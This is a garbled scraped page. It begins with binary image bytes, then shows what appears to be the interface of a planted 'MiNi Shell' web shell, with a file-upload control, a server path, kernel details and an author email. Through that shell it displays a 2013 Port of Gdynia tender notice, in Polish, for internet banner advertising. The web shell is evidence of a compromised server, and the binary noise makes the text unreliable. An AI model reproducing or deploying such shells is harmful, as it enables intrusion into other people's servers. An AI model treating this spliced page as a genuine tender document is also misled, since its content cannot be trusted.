JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130716/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130716/278404-N-2013.html

<p class="kh_header"><b>Gdynia: Postępowanie prowadzone w trybie przetargu nieograniczonego, na reklamę internetową w ramach promocji projektu: Rozbudowa infrastruktury portowej do obsługi statków ro-ro z dostępem drogowym i kolejowym w Porcie Gdynia.</b><br>
<b>Numer ogłoszenia: 278404 - 2013; data zamieszczenia: 16.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Morskiego Portu Gdynia S.A. , ul. Rotterdamska 9, 81-337 Gdynia, woj. pomorskie, tel. 058 627 40 36, faks 058 6274578.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.port.gdynia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Port morski.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Postępowanie prowadzone w trybie przetargu nieograniczonego, na reklamę internetową w ramach promocji projektu: Rozbudowa infrastruktury portowej do obsługi statków ro-ro z dostępem drogowym i kolejowym w Porcie Gdynia..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest reklama banerowa w portalach internetowych dotycząca projektu pn: Rozbudowa infrastruktury portowej do obsługi statków ro-ro z dostępem drogowym i kolejowym w Porcie Gdynia, współfinansowanego ze środków Unii Europejskiej. 
2.Przedmiot zamówienia podzielono na trzy zamówienia częściowe:
1)Kampania reklamowa w serwisie o zasięgu ogólnopolskim - minimalna ilość odsłon w kampanii : 1 000 000
2)Kampania reklamowa w serwisie o zasięgu lokalnym - minimalna ilość odsłon w kampanii : 1 400 000
3)Kampania reklamowa w serwisie o zasięgu branżowym - minimalna ilość odsłon w kampanii : 1 000 000.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.34.10.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: nie figurują w Krajowym Rejestrze Długów.
2.Spełnienie warunku określonego w ust. 1., pkt. 4) i 5) ustali Zamawiający, po sprawdzeniu w/w wykazu i rejestru, wg formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">wypełniony formularz asortymentowo-cenowy stanowiący załącznik nr 3 do SIWZ.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oferta pisemna pod rygorem nieważności, sporządzona według wzoru formularza stanowiącego załącznik nr 1 do SIWZ,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie zmiany niniejszej Umowy mogą być dokonywane jedynie w formie pisemnej, w formie obustronnie podpisanego aneksu, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.port.gdynia.pl/pl/przetargi/aktualne-przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zarządu ZMPG S.A. Dział Zarządzania Projektami Unijnymi
81-337 Gdynia ul. Rotterdamska 9 pok 113 I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.07.2013 godzina 10:30, miejsce: Siedziba Zarządu ZMPG S.A. Dział Zarządzania Projektami Unijnymi
81-337 Gdynia ul. Rotterdamska 9 pok 113 I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inwestycja Rozbudowa infrastruktury portowej do obsługi statków ro-ro z dostępem drogowym i kolejowym w Porcie Gdynia współfinansowana jest ze środków Unii Europejskiej - Umowa o dofinansowanie nr POIS.07.02.00-00-018/11-00, w ramach działania 7.2. Rozwój Transportu Morskiego, priorytetu VII Transport Przyjazny Środowisku, Programu Operacyjnego Infrastruktura i Środowisko 2007 - 2013, zawarta została w Warszawie w dniu 12.07.2012 r. 
http://www.cupt.gov.pl/index.php?id=1226
http://pois.transport.gov.pl/pl/realizacje/p45.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> kampania reklamowa w serwisie Internetowym o zasięgu ogólnopolskim.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Minimum dwukrotna emisja pakietu reklamy banerowej w odstępie min. 3 miesięcy pomiędzy emisjami. Ostatnia emisja powinna być w grudniu 2014r.
Portal o charakterze informacyjno publicystycznym - dotyczący spraw gospodarczych, ekonomicznych, finansowych, prawnych, inwestycyjnych z wyłączeniem dominującej treści o charakterze sensacyjnym, erotycznym, plotkarskim.
Zasięg (liczba unikalnych użytkowników/miesięcznie): powyżej 2 mln użytkowników
Miejsce reklamy: strona główna, obszar widoczny bez przewijania w standardowej przeglądarce na monitorze o rozdzielczości pionowej obrazu 768px 
Wielkość banera reklamowego:  szerokość banera - min. 200px, wysokość banera - min. 100px;
Okres realizacji kampanii: sierpień  2013 - grudzień 2014
Minimalna ilość odsłon reklamy w kampanii: 1 000 000
Targetowanie: brak
Pożądana grupa docelowa odbiorców: 18-60 lat
Wykonawca po wykonaniu zlecenia dostarczy Zamawiającemu raport z realizacji usługi zawierający statystyki: min. Ilość odsłon reklamy, ilość kliknięć w ujęciu dziennym oraz całego okresu kampanii.
Wykonawca wykona w porozumieniu ze Zamawiający i przedstawi do zatwierdzenia Zamawiającemu baner reklamowy będący przedmiotem emisji najpóźniej na 2 tygodnie przed planowana emisją banera.

Celem I części kampanii jest poinformowanie jak największej ilości osób na obszarze całego kraju o projekcie będącym przedmiotem niniejszej kampanii oraz o jego dofinansowaniu przez UE.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.34.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> kampania reklamowa w serwisie Internetowym o zasięgu lokalnym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Minimum dwukrotna emisja pakietu reklamy banerowej w odstępie min 3 miesięcy pomiędzy emisjami. Ostatnia emisja powinna być w grudniu 2014r. Serwis poruszający w przeważającej ilości tematy lokalne obszarów Gdyni, Sopotu i Gdańska:
Portal o charakterze informacyjno-publicystycznym, dotyczący spraw gospodarczych, ekonomicznych, finansowych, prawnych, inwestycyjnych z wyłączeniem dominującej treści o charakterze sensacyjnym, erotycznym, plotkarskim,
Zasięg (liczba unikalnych użytkowników/miesięcznie) : powyżej 150 000 użytkowników 
Miejsce reklamy: strona główna serwisu, obszar widoczny bez przewijania w standardowej przeglądarce na monitorze o rozdzielczości pionowej obrazu 768px 
Wielkość banera reklamowego:  szerokość banera - min. 200px, wysokość banera - min. 100px;
Okres realizacji kampanii: sierpień 2013 - grudzień 2014
Minimalna ilość odsłon reklamy w kampanii: 1 400 000
Targetowanie: brak
Wykonawca po wykonaniu zlecenia dostarczy Zamawiającemu raport z realizacji usługi zawierający statystyki: min. Ilość odsłon reklamy, ilość kliknięć w ujęciu dziennym oraz całego okresu kampanii.
Wykonawca wykona w porozumieniu ze Zamawiający i przedstawi do zatwierdzenia Zamawiającemu baner reklamowy będący przedmiotem emisji najpóźniej na 2 tygodnie przed planowana emisją banera.

Celem II części kampanii jest poinformowanie jak największej ilości osób na obszarze lokalnym (w okolicach inwestycji), zainteresowanych tematami lokalnymi trójmiasta (Gdańsk, Sopot, Gdynia) o projekcie będącym przedmiotem niniejszej kampanii oraz o jego dofinansowaniu przez UE..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.34.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> kampania reklamowa  w serwisie Internetowym o charakterze branżowym - branże: gospodarka morska, transport.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Minimum dwukrotna emisja pakietu reklamy banerowej w odstępie min. 3 miesięcy pomiędzy emisjami. Ostatnia emisja powinna być w grudniu 2014r.
Portal o charakterze branżowym - branże: gospodarka morska, transport - bez płatnego ograniczenia dostępu do treści (w żadnej części portalu); 
Zasięg (liczba unikalnych użytkowników/miesięcznie ): powyżej 10 000 użytkowników
Miejsce reklamy: strona główna serwisu, obszar widoczny bez przewijania w standardowej przeglądarce na monitorze o rozdzielczości pionowej obrazu 768px 
Wielkość banera reklamowego:  szerokość banera - min. 200px, wysokość banera - min. 100px; 
Okres realizacji kampanii: sierpień 2013 - grudzień 2014
Minimalna ilość odsłon reklamy w kampanii: 1 000 000
Targetowanie: brak
Wykonawca po wykonaniu zlecenia dostarczy Zamawiającemu raport z realizacji usługi zawierający statystyki: min. Ilość odsłon reklamy, ilość kliknięć w ujęciu dziennym oraz całego okresu kampanii.
Wykonawca wykona w porozumieniu ze Zamawiający i przedstawi do zatwierdzenia Zamawiającemu baner reklamowy będący przedmiotem emisji najpóźniej na 2 tygodnie przed planowana emisją banera.

Celem III części kampanii jest poinformowanie jak największej ilości osób związanych zawodowo lub zainteresowanych tematyką  branży - gospodarka morska, transport - o  projekcie będącym przedmiotem niniejszej kampanii oraz o jego dofinansowaniu przez UE..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.34.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com